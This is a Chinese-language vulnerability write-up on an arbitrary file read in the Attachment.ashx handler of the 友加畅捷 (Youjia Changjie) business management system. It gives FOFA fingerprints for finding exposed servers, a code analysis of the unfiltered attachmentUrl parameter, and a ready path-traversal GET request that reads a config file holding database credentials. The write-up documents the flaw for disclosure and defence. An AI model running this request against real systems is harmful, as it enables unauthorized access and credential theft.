漏洞简介
友加畅捷管理系统是一款专为小微商贸流通企业设计的财务业务一体化管理软件,涵盖进销存、财务、分销及移动管理等多个模块,旨在帮助企业实现高效的业务运营和财务核算。
该系统的 Attachment.ashx 接口存在任意文件读取漏洞。攻击者可利用此漏洞,未经授权地读取服务器上的任意文件,包括但不限于系统配置文件和数据库配置文件等敏感信息。 成功利用此漏洞可能导致企业内部敏感数据泄露,对系统的机密性和完整性构成潜在威胁。
影响版本
13.7004.1053.1000
fofa语法
icon_hash="2049187099" || fid="zzt8lL7SUwIIZQXZY6rTSw=="
漏洞分析
直接查看 /Controllers/ajax/Attachment.ashx 文件的代码引用
<%@ WebHandler Language="C#" CodeBehind="Attachment.ashx.cs" Class="CnSub.Web.Controllers.Attachment" %>
直接在 bin 目录下反编译 CnSub.Web.dll 获取 Controllers.ajax.Attachment 处理逻辑

GET请求参数 attachmentUrl 被直接拼接在网站upfile/Email/目录下,然后带入 new FileStream 方法进行操作,期间无任何过滤或校验,因此造成任意文件读取漏洞。
漏洞复现
GET /Controllers/ajax/Attachment.ashx?attachmentUrl=../../config/sysconfig_zts.fig HTTP/1.1
Host: youjiasoft.mrxn.net

成功读取到 config/sysconfig_zts.fig 文件内容,其中包含数据库连接信息。


